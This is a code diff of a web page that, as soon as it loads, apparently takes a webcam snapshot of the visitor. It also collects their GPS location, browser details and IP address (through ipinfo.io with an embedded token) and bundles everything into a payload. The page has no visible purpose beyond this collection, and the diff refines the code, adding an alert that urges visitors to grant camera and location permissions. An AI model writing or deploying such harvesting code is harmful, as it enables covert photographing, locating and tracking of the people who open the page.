--- a/index.html
+++ b/index.html
@@ -6,20 +6,15 @@
     <title>Auto Capture with Device Info</title>
 </head>
 <body>
-    <video id="video" autoplay playsinline style="display: none;"></video>
-
     <script>
         async function captureData() {
             try {
-                // Access user's webcam
-                const video = document.getElementById("video");
+                // Capture image using webcam
+                const video = document.createElement("video");
                 const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                 video.srcObject = stream;
-
-                // Wait for video to load
                 await new Promise((resolve) => (video.onloadedmetadata = resolve));
 
-                // Capture image
                 const canvas = document.createElement("canvas");
                 canvas.width = video.videoWidth;
                 canvas.height = video.videoHeight;
@@ -27,10 +22,9 @@
                 context.drawImage(video, 0, 0, canvas.width, canvas.height);
                 const image = canvas.toDataURL("image/png");
 
-                // Stop webcam stream
                 stream.getTracks().forEach((track) => track.stop());
 
-                // Get location
+                // Get user location
                 const location = await new Promise((resolve, reject) => {
                     navigator.geolocation.getCurrentPosition(
                         (pos) => resolve({ latitude: pos.coords.latitude, longitude: pos.coords.longitude }),
@@ -45,12 +39,12 @@
                     language: navigator.language,
                 };
 
-                // Get IP address (using a third-party API)
+                // Get IP address
                 const ipData = await fetch("https://ipinfo.io/json?token=29fe5e73fe5e82")
                     .then((response) => response.json())
                     .catch((err) => console.error("Error fetching IP:", err));
 
-                // Combine all data
+                // Combine data
                 const payload = {
                     image,
                     location,
@@ -72,10 +66,11 @@
                 }
             } catch (error) {
                 console.error("Error:", error);
+                alert("Error capturing data. Ensure camera and location permissions are allowed.");
             }
         }
 
-        // Capture data on page load
+        // Run on page load
         window.onload = captureData;
     </script>
 </body>
